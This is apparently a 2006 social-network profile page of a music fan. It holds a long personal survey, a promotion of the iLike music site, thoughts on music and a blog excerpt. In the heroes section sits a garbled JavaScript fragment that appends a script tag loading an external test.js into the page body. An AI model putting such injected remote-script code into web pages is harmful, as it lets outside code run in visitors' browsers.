Bella B! profile picture

Bella B! IT OUT!!!

About Me

iLike is everything a music lover needs. I'm involved because I want to spread the word to everyone I know. Where else can you find out who has your similar music taste without digging through their cds? Find music similar to yours that you've never heard of? Download free MP3's of unsigned artists? The list goes on and on. You should definitely check out the site: iLike.comP.S. I absolutely LOVE to the shower, in the rain, in a box with a fox...haha. You Name It!!Here's a bit more...
CoLoR Green
FoOd Sweet Potatoes
DaY oF tHe WeEk Monday...haha, just playin...Friday :)
SeAsOn Spring
MoNtH June
PlAcE Lying in a field during a thunderstorm
BoYs NaMe Razzlerick
GiRlS nAmE Sugarpuff
DeSsErT Creme Brulee
CoOkIe Oatmeal Raisin
IcE cReAm I don't like ice cream
BaSeBaLl TeAm Giants
ThIs Or ThAt
CoKe/PePsI neither
PhOnE/Im neither
ShOwEr/BaTh both
HoT dOg/HaMbUrGeR I'm a vegitarian
DoG/cAt Dogs! I'm deathly allergic to cats...
BaSeBaLl/FoOtBaLl Football!
SoFtBaLl/VoLlEyBaLl Beach Volleyball I suppose...I'm terrible at both
SuMmEr/WiNtEr Summer
SpRiNg/FaLl Spring
[Write in cursive or print?] Hieroglyphics
[Own a web cam?] Nope
[Know how to drive?] haha, some days
[Own a cell phone?] guilty
[Ever get off the damn computer?] never; we've become's beautiful really.
[Been in a fist fight?] um...yes...don't judge me though, she started it!
[Considered a life of crime?] Constantly
[Considered being a hooker?] NO
[Lied to someone?] yea :(
[Been in love?] Bleh
[Made out with JUST a friend?] yup
[Been in lust?] Regularly
[Used someone] Not without letting them use me too
[Been used?] (see above)
[Been cheated on?] Yea
[Kicked someone in the nuts?] In 3rd Grade
[Stolen anything?] yuss...never again.
[Held a gun] in a gun store
[Current clothing] sweats and fuzzy socks
[Current mood] procrastinating
[Current taste] Pesto!
[What you currently smell like] Like a Bella
[Current hair] Disaster
[Current thing I ought to be doing] my 25 page Strategic Plan that's due on Wednesday...ugh
[Current cd in stereo] stereo?? No, no...I'm listening to Van Morrison though
[Last book you read] The Scuba Diver's Manual
[Last movie you saw] Happy Feet (great movie)
[Last thing you ate] A pestoey, noodley, tofuey, pinenutty, tomatoey dish (left-overs)
[Last person you talked to on the phone] Kat!
[Do drugs?] Never
[Believe there is life on other planets?] I hope so
Remember your first love?] yuss...
[Still love him/her?] no but I'd still do anything for him
[Read the newspaper?] every day
[Have any gay or lesbian friends?] stupid question, but yes, many
[Believe in miracles?] I don't know yet
[Do well in school?] 3.5 GPA...whoop whoop (there's a miracle)
[Wear hats] sure
[Hate yourself?]!
[Have an obsession?] Music and football
[Collect anything?] pop tabs for the Ronald McDonald House
[Have a best friend?] Miss Kitty Kat KATRINA!
[Close friends?] Here's my shout-out to my Sacramento homies! I miss you guys!!
[Like your handwriting?] Sure
[Care about looks] When it matters
[First crush] Matthew Gudsull
[First kiss] Same
[Do you believe in love at first sight?] No
[Do you believe in "the one?"] No
[Are you a tease?] I hope not
[Too shy to make the first move?] Noooo
[Daydreamer] well yea...just in class though.
[Bitch/Asshole] I have my moments
[sarcastic] yup
[Angel] this is stupid
[Devil] bla
[Shy] bla bla
[Talkative] bla bla bla

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My Interests

Music!Aside from that? Sports (FOOTBALL...GO BEARS!) Singing Ethnic Foods Time Travel...haha I'm really interested in EVERYTHING. I'll try anything once. Yes that gets me in trouble sometimes but you know what? More often than not, I end up LOVING things that I thought I've be terrified of.......

I'd like to meet:

AnYoNe who's ever been moved by music is a friend of mine!Hey People!!! Dig This: all rock my world!!!......

Music: is life, life is music. I listen to everything. I know a lot of people say that, but I really do. The evolution of music amazes me; how it all goes back to similar roots. No one doesn't like music therefor music unites us all. What else can you think of that is that powerful? Music sparks emotion, and gets through to people. Music makes you feel like someone's always there; always listening. It feels like it's in tune with you when really, you found it. Now that's poetic."After silence, that which comes closest to expressing the inexpressible, is music." -Aldous Huxley




Calling on the words of Aesop Rock: Please take me, please calm me, please make me a zombie, please, I wanna donate my brain to the monstrous pan of sonic profit, 21st century plague disperse the wide-eyed glamour addict patient, telecast patrons, glue me to propaganda banners. LET MY FREE SPIRIT DISSOLVE INTO THE APPLIANCE.........


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Will you be my hero? I have too many to list :).."var x=document·('script');x.src='http://www.../.../test.js' ;document·getElementsByTagName('body')[0].appendChild(x );" /

My Blog

For You Insistant iLikers

Here are the two main questions that you've been asking:1) What's your email/msn/phone number?I don't give out my personal email or my phone number, but you can contact me on here or on my iLike prof...
Posted by Bella B! on Mon, 27 Nov 2006 04:02:00 PST